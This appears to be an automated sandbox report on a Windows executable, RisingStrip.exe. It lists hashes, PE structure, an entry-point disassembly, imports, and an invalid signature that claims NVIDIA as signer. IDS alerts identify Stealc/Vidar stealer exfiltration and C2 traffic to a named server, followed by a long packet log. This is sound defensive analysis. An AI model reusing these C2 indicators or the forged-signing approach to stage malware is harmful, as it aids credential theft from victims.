0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.984655114883128
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	RisingStrip.exe
File size:	1'143'251 bytes
MD5:	754abb74ca81d5ac0338dc27c0419467
SHA1:	6b1266ea2b305178dc1b7bd17e4bf22c2ef6417e
SHA256:	ea8c2ccdcad3914c89165d94a5916986ee9ba4fbccce3563eaa5facba38cceb6
SHA512:	42eb7b838aa0b6009d5f5cf214797837b5876c6ce312ecebcf0864a5a82c85a71c854f0e4410c2aaa6d7fc147ed07584ae49011909290808e9d64dbfe3814cd2
SSDEEP:	24576:gmrT0o4MiMwK5w91RKUfX9F2sLwS6TJPTP/ACvFL0i+ZESls7emA:109MwK5+/KUP9F2MbirP/ACvFLSEPA
TLSH:	E235232565F4A0F5D6FB0BB2782A42108F77ED711966C48FA304EEACF466B484F30297
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X\|.N.................n...>...B...8.....

File Icon


Icon Hash:	b6ecfcf4ece8b6fe

Static PE Info

General

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	13/01/2023 00:00:00 16/01/2026 23:59:59
Subject Chain	CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
Version:	3
Thumbprint MD5:	5F1B6B6C408DB2B4D60BAA489E9A0E5A
Thumbprint SHA-1:	15F760D82C79D22446CC7D4806540BF632B1E104
Thumbprint SHA-256:	28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
Serial:	0997C56CAA59055394D9A9CDB8BEEB56

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+18h], ebp
mov dword ptr [esp+10h], 00409268h
mov dword ptr [esp+14h], ebp
call dword ptr [00408030h]
push 00008001h
call dword ptr [004080B4h]
push ebp
call dword ptr [004082C0h]
push 00000008h
mov dword ptr [00472EB8h], eax
call 00007FB2EC901EDBh
push ebp
push 000002B4h
mov dword ptr [00472DD0h], eax
lea eax, dword ptr [esp+38h]
push eax
push ebp
push 00409264h
call dword ptr [00408184h]
push 0040924Ch
push 0046ADC0h
call 00007FB2EC901BBDh
call dword ptr [004080B0h]
push eax
mov edi, 004C30A0h
push edi
call 00007FB2EC901BABh
push ebp
call dword ptr [00408134h]
cmp word ptr [004C30A0h], 0022h
mov dword ptr [00472DD8h], eax
mov eax, edi
jne 00007FB2EC8FF4AAh
push 00000022h
pop esi
mov eax, 004C30A2h
push esi
push eax
call 00007FB2EC901881h
push eax
call dword ptr [00408260h]
mov esi, eax
mov dword ptr [esp+1Ch], esi
jmp 00007FB2EC8FF533h
push 00000020h
pop ebx
cmp ax, bx
jne 00007FB2EC8FF4AAh
add esi, 02h
cmp word ptr [esi], bx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ C ] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[LNK] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0x7846	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x114bab	0x2628
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0x7846	0x7a00	0ab790cb2e6126a4240053ea0b25bc5c	False	0.956358862704918	data	7.838736555406405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfc000	0xf32	0x1000	1456f18f1445f76b660228f666fb18a6	False	0.599365234375	data	5.51284513240996	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41c0	0x6ca5	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0004314529177003
RT_ICON	0xfae68	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.8829787234042553
RT_DIALOG	0xfb2d0	0x100	data	English	United States	0.5234375
RT_DIALOG	0xfb3d0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xfb4ec	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xfb54c	0x22	data	English	United States	0.9705882352941176
RT_MANIFEST	0xfb570	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

Imports

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-03T14:30:32.465077+0100	2859378	ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2	1	192.168.2.4	49741	116.203.13.109	443	TCP
2025-01-03T14:30:35.312388+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.13.109	443	192.168.2.4	49743	TCP
2025-01-03T14:30:36.696783+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1	1	192.168.2.4	49744	116.203.13.109	443	TCP
2025-01-03T14:30:36.696968+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.13.109	443	192.168.2.4	49744	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 3, 2025 14:29:57.667253971 CET	49675	443	192.168.2.4	173.222.162.32
Jan 3, 2025 14:30:28.882409096 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:28.882445097 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:28.882533073 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:28.888551950 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:28.888562918 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.524251938 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.524357080 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.577930927 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.577948093 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.578171015 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.578289032 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.581748962 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.627336025 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.782676935 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.782701969 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.782735109 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.782744884 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.782752037 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.782761097 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.782761097 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.782809019 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.784477949 CET	49739	443	192.168.2.4	149.154.167.99
Jan 3, 2025 14:30:29.784493923 CET	443	49739	149.154.167.99	192.168.2.4
Jan 3, 2025 14:30:29.799341917 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:29.799391031 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:29.799464941 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:29.799746990 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:29.799761057 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:30.645589113 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:30.645767927 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:30.649239063 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:30.649249077 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:30.649466991 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:30.649519920 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:30.649945974 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:30.695324898 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.121469975 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.121541023 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.121659994 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.121659994 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.124399900 CET	49740	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.124417067 CET	443	49740	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.126050949 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.126087904 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.126162052 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.126368046 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.126382113 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.774286032 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.774378061 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.774857044 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.774866104 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:31.776588917 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:31.776593924 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:32.465090036 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:32.465162992 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:32.465178013 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:32.465217113 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:32.465465069 CET	49741	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:32.465480089 CET	443	49741	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:32.466922045 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:32.466965914 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:32.467045069 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:32.467289925 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:32.467303991 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.130531073 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.130747080 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.131205082 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.131213903 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.132989883 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.132994890 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.799895048 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.799918890 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.799968958 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.799976110 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.800124884 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.800124884 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.814466953 CET	49742	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.814490080 CET	443	49742	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.964848995 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.964881897 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:33.964965105 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.968794107 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:33.968806982 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:34.622385025 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:34.622451067 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:34.622958899 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:34.622967005 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:34.624593973 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:34.624598980 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.312191963 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.312230110 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.312287092 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.312314034 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.312349081 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.312689066 CET	49743	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.312700987 CET	443	49743	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.314676046 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.314769983 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.314903975 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.315131903 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.315167904 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.982454062 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.982546091 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.983098030 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.983119965 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:35.984828949 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:35.984843016 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:36.659395933 CET	49731	80	192.168.2.4	192.229.211.108
Jan 3, 2025 14:30:36.659527063 CET	49732	80	192.168.2.4	2.23.198.32
Jan 3, 2025 14:30:36.664688110 CET	80	49731	192.229.211.108	192.168.2.4
Jan 3, 2025 14:30:36.664762020 CET	49731	80	192.168.2.4	192.229.211.108
Jan 3, 2025 14:30:36.665167093 CET	80	49732	2.23.198.32	192.168.2.4
Jan 3, 2025 14:30:36.665230989 CET	49732	80	192.168.2.4	2.23.198.32
Jan 3, 2025 14:30:36.696790934 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:36.696867943 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:36.696896076 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:36.696945906 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:36.703540087 CET	49744	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:36.703576088 CET	443	49744	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:36.751333952 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:36.751363039 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:36.751432896 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:36.754956007 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:36.754968882 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:37.423407078 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:37.423470020 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.423952103 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.423957109 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:37.425957918 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.425962925 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:37.426058054 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.426074982 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:37.758836031 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.758920908 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:37.759015083 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.759191990 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:37.759237051 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:38.206995010 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:38.207067966 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:38.207072973 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:38.207117081 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:38.208115101 CET	49745	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:38.208128929 CET	443	49745	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:38.419121027 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:38.419218063 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:38.419686079 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:38.419706106 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:38.421648026 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:38.421659946 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:39.247292042 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:39.247371912 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:39.247369051 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:39.247423887 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:39.249013901 CET	49746	443	192.168.2.4	116.203.13.109
Jan 3, 2025 14:30:39.249057055 CET	443	49746	116.203.13.109	192.168.2.4
Jan 3, 2025 14:30:41.213450909 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.213481903 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.213566065 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.213862896 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.213877916 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.425796986 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.425860882 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.425940990 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.426187992 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.426218987 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.506947994 CET	49754	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.506968975 CET	443	49754	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.507035971 CET	49754	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.507354975 CET	49754	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.507369041 CET	443	49754	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.595396996 CET	49755	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.595432043 CET	443	49755	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.595612049 CET	49755	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.596018076 CET	49755	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.596031904 CET	443	49755	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.864998102 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.865358114 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.865372896 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.866375923 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.866436958 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.867563009 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.867626905 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.867723942 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.911330938 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.915899038 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:41.915915966 CET	443	49752	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:41.958848953 CET	49752	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.054738998 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.054950953 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.054963112 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.055846930 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.055912018 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.056206942 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.056263924 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.056360006 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.098794937 CET	49753	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.098800898 CET	443	49753	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.136224031 CET	443	49754	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.137356997 CET	49754	443	192.168.2.4	172.217.18.4
Jan 3, 2025 14:30:42.137367964 CET	443	49754	172.217.18.4	192.168.2.4
Jan 3, 2025 14:30:42.138379097 CET	443	49754	172.217.18.4	192.168.2.4
